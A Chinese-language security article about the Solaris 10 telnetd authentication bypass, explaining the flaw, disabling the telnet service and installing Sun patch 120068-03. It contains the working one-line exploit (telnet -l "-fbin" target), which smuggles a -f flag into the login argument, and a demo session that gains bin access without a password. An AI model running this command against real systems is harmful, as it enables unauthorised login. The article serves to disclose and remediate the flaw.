telnet安全漏洞是Telnet漸漸減少使用的重要因素之一。那么對(duì)于這方面的安全問題，我們就來詳細(xì)介紹一下。首先來了解一下telnet安全漏洞的基本情況。早期Solaris 2.6、7 和 8 的 telnetd存在一個(gè)漏洞, 可以通過/bin/login的環(huán)境變數(shù) TTYPROMPT 繞過驗(yàn)證，導(dǎo)致無需身份認(rèn)證即可登錄。最近，Solaris 10的telnet又被發(fā)現(xiàn)出現(xiàn)了漏洞，Sun也及時(shí)推出了補(bǔ)丁。

我們先來看問題的癥狀。漏洞出現(xiàn)的系統(tǒng)環(huán)境為Solaris 10及以后版本，安裝時(shí)沒有選擇默認(rèn)安裝。漏洞表現(xiàn)為通過在Solaris的telnet命令的-l選項(xiàng)后指定任意一個(gè)“-fusername”參數(shù)，就可以直接登錄進(jìn)入Solaris系統(tǒng)。

命令格式：

telnet -l "-fbin" target_address 

下面是通過telnet安全漏洞以bin用戶登錄系統(tǒng)的演示。

# telnet -l "-fbin" myhost  
Trying 172.21.60.120...  
Connected to myhost.  
Escape character is '^]'.  
Sun Microsystems Inc.　 SunOS 5.10　Generic January 2005  
$ id -a  
uid=2(bin) gid=2(bin) groups=2(bin),3(sys) 

如果管理員修改了/etc/default/login文件，在注釋掉CONSOLE行允許root遠(yuǎn)程登錄的情況下，訪問者可以利用該漏洞直接以root登錄系統(tǒng)，這樣對(duì)系統(tǒng)危害更大。

Kingcope最早給出了在OpenSolaris中發(fā)現(xiàn)的該漏洞的源代碼，并稱其為“0day”－零日漏洞。文章地址為：http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf

該文章中提供一個(gè)腳本，運(yùn)行后用戶可以獲得被登錄系統(tǒng)的adm用戶權(quán)限。

解決方法：

1. 禁止Solaris 10的telnet服務(wù)。

檢查本機(jī)的telnet服務(wù)是否啟動(dòng)。

# svccfg list | grep telnet  
network/telnet  
# svcs -l network/telnet  
fmri svc:/network/telnet:default  
name Telnet server  
enabled　true  
stateonline  
next_state　 none  
state_time　 Mon Feb 26 03:50:13 2007  
restartersvc:/network/inetd:default 

禁止telnet服務(wù)。

# svcadm disable svc:/network/telnet:default 

2. 下載安裝Sun的安全補(bǔ)丁（需Sun服務(wù)支持）。

Sun的技術(shù)支持工程師Alan Hargreaves在他2月13日的BLOG：http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit

中提到，最終解決該問題的補(bǔ)丁120068-03已經(jīng)發(fā)布。通過Solaris 10的Update Manager可以下載安裝該補(bǔ)丁，如圖所示。這里可以看到該補(bǔ)丁是2月21日發(fā)布的。

需要說明的是Solaris 10的補(bǔ)丁，除了Security和hardware相關(guān)補(bǔ)丁可以免費(fèi)下載，其它都是要服務(wù)支持的，就是Sun Service Plan。但是對(duì)于知道Patch號(hào)的，可以從http://sunsolve.sun.com中單個(gè)下載。這里可以在sunsolve上用PatchFinder查找120068-03補(bǔ)丁并下載，安裝到系統(tǒng)中。

安裝補(bǔ)丁后系統(tǒng)漏洞被禁止。

# showrev -p | grep 120068  
Patch: 120068-01 Obsoletes:　Requires:　Incompatibles:　Packages: SUNWtnetd  
Patch: 120068-03 Obsoletes:　Requires:　Incompatibles:　Packages: SUNWtnetd  
# telnet -l "-fbin" myhost  
Trying 172.21.60.120...  
Connected to myhost.  
Escape character is '^]'.  
Password: 

需要用戶輸入密碼登錄，可見當(dāng)前Solaris 10系統(tǒng)的telnet安全漏洞被修正。

對(duì)新發(fā)現(xiàn)的Solaris 10的telnet安全漏洞，Sun的反應(yīng)還算迅速，立刻推出了相應(yīng)補(bǔ)丁程序。這里也可以看見，任何操作系統(tǒng)都是有Bug存在的，Sun通過OpenSolaris開源，使得系統(tǒng)的bug能盡快被發(fā)現(xiàn)和完善。